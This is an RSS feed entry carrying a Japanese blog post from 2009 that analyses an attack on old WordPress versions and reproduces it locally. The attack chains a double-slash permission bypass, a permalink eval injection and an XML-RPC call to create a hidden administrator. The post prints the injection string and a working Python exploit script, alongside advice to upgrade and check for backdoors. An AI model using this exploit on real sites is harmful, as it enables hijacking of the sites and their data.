<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>さくらたんどっとびーず &#187; セキュリティ</title>
	<atom:link href="http://sakuratan.biz/archives/tag/%e3%82%bb%e3%82%ad%e3%83%a5%e3%83%aa%e3%83%86%e3%82%a3/feed" rel="self" type="application/rss+xml" />
	<link>http://sakuratan.biz</link>
	<description>モロモロ工事中です</description>
	<lastBuildDate>Sun, 25 Jun 2023 12:51:51 +0000</lastBuildDate>
	<language>ja</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.2.1</generator>
		<item>
		<title>現在進行中の WordPress に対する攻撃の詳細と再現</title>
		<link>http://sakuratan.biz/archives/1208</link>
		<comments>http://sakuratan.biz/archives/1208#comments</comments>
		<pubDate>Sun, 06 Sep 2009 23:45:54 +0000</pubDate>
		<dc:creator>さくら</dc:creator>
				<category><![CDATA[WordPress]]></category>
		<category><![CDATA[スクリプトインジェクション]]></category>
		<category><![CDATA[セキュリティ]]></category>

		<guid isPermaLink="false">http://sakuratan.biz/?p=1208</guid>
		<description><![CDATA[WordPress フォーラムの http://wordpress.org/support/topic/307518 にて今回の攻撃方法が議論されていました。クラッカーの攻撃手法が解明されていましたのでご説明したいと思います。 と、特に攻撃方法が命名されていなかったので、「現在進行中の WordPress に対する攻撃」のことを今回の攻撃と記載しています…ややこしいので誰かとっとと名前付けてくれな... <div style="margin-top:1ex"><a href="http://sakuratan.biz/archives/1208">(続きを読む)</a></div>]]></description>
			<content:encoded><![CDATA[<p>WordPress フォーラムの <a href="http://wordpress.org/support/topic/307518">http://wordpress.org/support/topic/307518</a> にて今回の攻撃方法が議論されていました。クラッカーの攻撃手法が解明されていましたのでご説明したいと思います。</p>
<p>と、特に攻撃方法が命名されていなかったので、「現在進行中の WordPress に対する攻撃」のことを<strong>今回の攻撃</strong>と記載しています…ややこしいので誰かとっとと名前付けてくれないかしら？wordpress.org のサイト構造にあまり詳しくないので実際はもう命名されてるのかもしれませんがw</p>
<p>で、先に結論から言いますと、今回の攻撃は権限チェックのバグとスクリプトインジェクションが組み合わされたもののようです。<strong>攻撃が成功すると、ダッシュボードから見えない管理者アカウントが作成されます。また、バックドアが仕込まれることもあるようです。</strong></p>
<h3>攻撃条件</h3>
<p>まず最初に、今回の攻撃が成功するための条件を説明します。攻撃方法に興味の無い方はとりあえずここだけでも見といてください。（で <strong>WordPress を最新版にバージョンアップ</strong>してください。）</p>
<p>で、今回の攻撃は以下の条件を満たした WordPress サイトに対して可能です。</p>
<ul>
<li>WordPress が最新版ではない</li>
<li>新規ユーザーの登録が誰でも可能となっている</li>
</ul>
<p>新規ユーザーの登録は、【設定】→【一般】→【メンバーシップ】の「誰でもユーザー登録ができるようにする」がチェックされている場合可能です。デフォルトは…どうなってたんだろ？wごめん忘れた。個人ブログの場合は登録できないようにしている場合がほとんどだと思いますが、誰でも登録できるようになっていないかご確認ください。もちろん必要があってそうしている場合は別問題ですw</p>
<p>なお、<strong>既に攻撃されている場合は最新版にバージョンアップしても直りません</strong>ので、<a href="http://sakuratan.biz/archives/1204">WordPress のパーマリンクと RSS に関する問題について</a>等を参考にチェック及び対応をしてください。</p>
<h3>攻撃方法</h3>
<p>実際の攻撃は以下の3ステップで行われます。</p>
<ol>
<li>/wp-login.php から新規ユーザーを作成する。</li>
<li>/wp-admin//options-permalink.php にアクセスし、パーマリンクを %&#038;({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&#038;%/ など <a href="http://www.journeyetc.com/uncategorized/wordpress-permalink-rss-problems/">WordPress Permalink &amp; Rss problems</a> で説明されている形式に変更する。</li>
<li>/xmlrpc.php にアクセスし、スクリプトインジェクション可能な XML-RPC コールを行い（ユーザーパネルから見えない隠された）新規管理者を作成する。</li>
</ol>
<p>各ステップの詳細ですが、まず最初の /wp-login.php からのユーザーの作成については、WordPress の設定で元から誰でも新規ユーザーを追加できる状態になっていなければできませんのでこれ自体はセキュリティホールでは無いです。ここにもセキュリティホールがあるかもしれませんが、フォーラムでは特に言及されておらず、こちらで確認した限りではこの辺にセキュリティホールは無さそうでした。無いとは保証できませんがw</p>
<p>次の /wp-admin//options-permalink.php はダッシュボードの【パーマリンク設定】へのアクセスなんですが、デフォルトの新規ユーザー作成は「購読者」権限で行われるので、本来はアクセスできないページへアクセスしてることになります。これが <a href="http://corelabs.coresecurity.com/index.php?action=view&amp;type=advisory&amp;name=WordPress_Privileges_Unchecked"> WordPress Privileges Unchecked in admin.php and Multiple Information Disclosures &#8211; Corelabs</a> で説明されている // バグです。ちなみに購読者権限では /wp-admin/options-permalink.php にはアクセスできず、/wp-admin//options-permalink.php とスラッシュを重ねたときだけアクセスできるようになるのが、このバグのキモです。（つーか最初フォーラムを流し読みしてたとき完全に読み飛ばしてたw）</p>
<p>最後の xmlrpc.php へのアクセスでは wp-include/rewrite.php で定義される url_to_postid 関数が呼び出される XML-RPC を呼び出します。パーマリンクを改造した状態で url_to_postid を呼び出すとスクリプトインジェクションが可能なためです。WordPress 2.7.1 では、url_to_postid 関数が呼び出される XML-RPC コールは wp.newComment、pingback.ping、pingback.extensions.getPingbacks の三つです。このいずれかを呼び出すと、%&#038;({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&#038;%/ が  url_to_postid 関数内の eval で実行されスクリプトインジェクションが発生します。このとき Referer HTTP ヘッダに base64 エンコードした PHP コードを含めてリクエストすると、基本的には何でも実行できてしまいます。実際の攻撃ではここで <a href="http://wordpress.org/support/topic/307518/page/2#post-1199642">http://wordpress.org/support/topic/307518/page/2#post-1199642</a> に掲載されているコードが実行され、管理者アカウントが作成されます。</p>
<p>なお実際の攻撃の際、新規作成された管理者は JavaScript によりメニューの【ユーザー】から隠されます。ただこの辺は、今回の攻撃の本質的な部分ではないと思いますのでこの記事では説明しません。興味のある方は <a href="http://wordpress.org/support/topic/307518/page/2#post-1199642">http://wordpress.org/support/topic/307518/page/2#post-1199642</a> からリンクされている http://links.webwordpress.cn/data/shortpart2.txt の中身か <a href="http://wordpress.org/support/topic/307518/page/2#post-1199846">http://wordpress.org/support/topic/307518/page/2#post-1199846</a> をご覧ください。</p>
<p>また攻撃成功後、gpc_ で始まる関数が index.php 等に追加されることがあるようです。実際に追加されるコードについては、<a href="http://www.seanrees.com/2009/09/02/well-an-update-worth-its-salt/">Well, an update worth its salt &#8211; sean’s place</a> をご覧ください。中身はサイトが対策を取った後で再度侵入するためのバックドアのようです。こちらについても冒頭のフォーラムで言及されているのですが、必ず仕込まれる訳ではないなど不明な点が多くこの記事では説明を省略しています。フォーラムにて、<a href="http://wordpress.org/support/topic/307518/page/3#post-1199850">gpc_ で grep をかけろ</a>との助言がありますので、攻撃されているかチェックする際に実行した方が良いと思います。いずれにせよ管理者権限の取得は攻撃の第一段階に過ぎない様です。</p>
<h3>攻撃の再現</h3>
<p>以上の内容で手元の環境（WordPress 2.7.1）に対して攻撃を再現してみました。</p>
<p>まず WordPress を誰でもユーザーを登録できる状態にしてから普通に /wp-login.php へアクセスして適当に新規ユーザーを作成します。このとき作成される新規ユーザーの権限は（元からの設定で）購読者としています。</p>
<p>次に作成したユーザーでログインし、/wp-admin//options-permalink.php へアクセスします。以下のキャプチャではちょっと分かりにくいかもしれませんが、ダッシュボードの下のメニューに【設定】→【パーマリンク設定】が表示されていないにも関わらずパーマリンク設定を開いており、本来権限が無いページにアクセスしているのが判別できると思います。</p>
<p><img src="http://sakuratan.biz/blog/wp-content/uploads/2009/09/permalink.png" alt="パーマリンク設定" title="パーマリンク設定" width="447" height="361" class="alignnone size-full wp-image-1211 capture" /></p>
<p>アクセス後はカスタム構造を選択し、%&#038;({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&#038;%/ を入力します。（その際先頭に / が追加されますので、実際のパーマリンクは /%&#038;({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&#038;%/ になります。）</p>
<p>最後に base64 エンコードされた PHP コードを Referer に指定して /xmlrpc.php にアクセスし、pingback.extensions.getPingbacks  XML-RPC コールを呼び出します。前述したとおり wp.newComment や pingback.ping XML-RPC コールでも攻撃可能ですが、pingback.extensions.getPingbacks 以外は設定で無効にできるためこれを呼び出すのが一番確実だと思います。</p>
<p>この部分の攻撃の再現には以下のような Python スクリプトを作って実行しました。実際の攻撃では file_get_contents を使用して外部からテキストファイルを読み込む等、（主に隠された管理者を作成するため）exploit_code に相当する部分がもっと複雑なのですが、あくまで再現が主眼ですので新規ユーザーを管理者権限で作成するところまでにしました。</p>
<pre>
from base64 import standard_b64encode
from xmlrpclib import ServerProxy, Transport, ResponseError

baseuri = 'http://localhost'
exploit_code = "$uid=wp_create_user('test','test');$u=new WP_User($uid);$u->set_role('administrator');exit();"

class MyTransport(Transport):
    def send_user_agent(self, connection):
        Transport.send_user_agent(self, connection)
        connection.putheader('Referer', standard_b64encode(exploit_code))

server = ServerProxy(baseuri + '/xmlrpc.php', transport=MyTransport(use_datetime=0))

try:
    server.pingback.extensions.getPingbacks(
        baseuri + '/%&#038;(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&#038;%/')
except ResponseError:
    pass
</pre>
<p>スクリプト実行後、管理者権限を持つユーザー test（パスワードも test）が作成されます。これでこの WordPress に対して何でもできるようになりましたw</p>
<h3>バージョン 2.8.4 の安全性</h3>
<p>攻撃に関わる要素はだいたい把握できたと思いますので、簡単にバージョン 2.8.4 で同じ問題が発生しないか確認してみました。</p>
<p>まず /wp-admin//options-permalink.php へのアクセスですができませんでした。パーマリンクの書き換えができなくなってますので今回の攻撃は 2.8.4 に対して効果は無さそうです。<a href="http://corelabs.coresecurity.com/index.php?action=view&amp;type=advisory&amp;name=WordPress_Privileges_Unchecked"> WordPress Privileges Unchecked in admin.php and Multiple Information Disclosures &#8211; Corelabs</a> では // バグは 2.8.0 にて対策されていると説明されていますので、2.8.4 未満でも問題は発生しないっぽいです。ただ私の方では 2.8.4 しか確認していませんので、とりあえず最新版にしといた方が無難だと言っときます。</p>
<p>次に url_to_postid での eval ですが特に 2.7.1 と変わってないようでした。eval する際に変数展開が必要みたいで、単純に</p>
<pre>eval("\$query = \"" . addslashes($query) . "\";");</pre>
<p>を</p>
<pre>eval("\$query = '" . addslashes($query) . "';");</pre>
<p>に変えるのは今のところ難しいっぽいです。具体例にどうこうって訳ではありませんが、また何か問題発生するかもしれません。</p>
<h3>その他</h3>
<p>xmlrpc.php に対する攻撃は以前のバージョンから継続して試みられているようで、<a href="http://ocaoimh.ie/did-your-wordpress-site-get-hacked/">Did your WordPress site get hacked?</a> にその手法が説明されています。今回の攻撃においても対応のためにとりあえず「xmlrpc.php を消した」人がフォーラムにいました。</p>
<p>またフォーラムにて、WordPress のコアファイルのパーミッションをウェブサーバから更新できないようにしとくべきだとの指摘も見られましたが、スクリプトインジェクション可能な状態でパーミッションを変えてもクラッカーが chmod すればすり抜けられますので、個人的にはセキュリティ面ではあまり寄与しないと思います。（WordPress 本体やプラグインのバグからサイトを守るという意味では重要だと思いますが。）</p>
<h3>プラグイン</h3>
<p>フォーラムの議論の中で、いくつか使えそうなプラグインが推薦されていましたので紹介しておきます。</p>
<ul>
<li><a href="http://ocaoimh.ie/exploit-scanner/">WordPress Exploit Scanner</a></li>
<li><a href="http://www.village-idiot.org/archives/2008/04/16/postlogger-for-wordpress/">postlogger for wordpress</a></li>
</ul>
<p>紹介しといてこんなこと言うのもアレですが、正直両方とも微妙な感じです。何が微妙かは実際に使って体感してね！w</p>
<p>さくら</p>
<p>（追記 同日18:00ごろ）<br />
攻撃方法の xmlrpc.php の説明が分かりにくかったので言い回しを変えました。<br />
TechCrunch の<a href="http://jp.techcrunch.com/archives/20090905security-threat-wordpress-under-attack/">警告！ WordPress旧版は簡単に乗っ取られる―即刻アップデートを</a>にて、WordPressの親会社のAutomatticからこの件に関する発表はまだと報告されています。</p>
<p>（追記 9/8 12:20ごろ）<br />
冒頭の結論に攻撃結果を追加し、バックドアの説明を少し増やしました。</p>
]]></content:encoded>
			<wfw:commentRss>http://sakuratan.biz/archives/1208/feed</wfw:commentRss>
		<slash:comments>9</slash:comments>
		</item>
	</channel>
</rss>
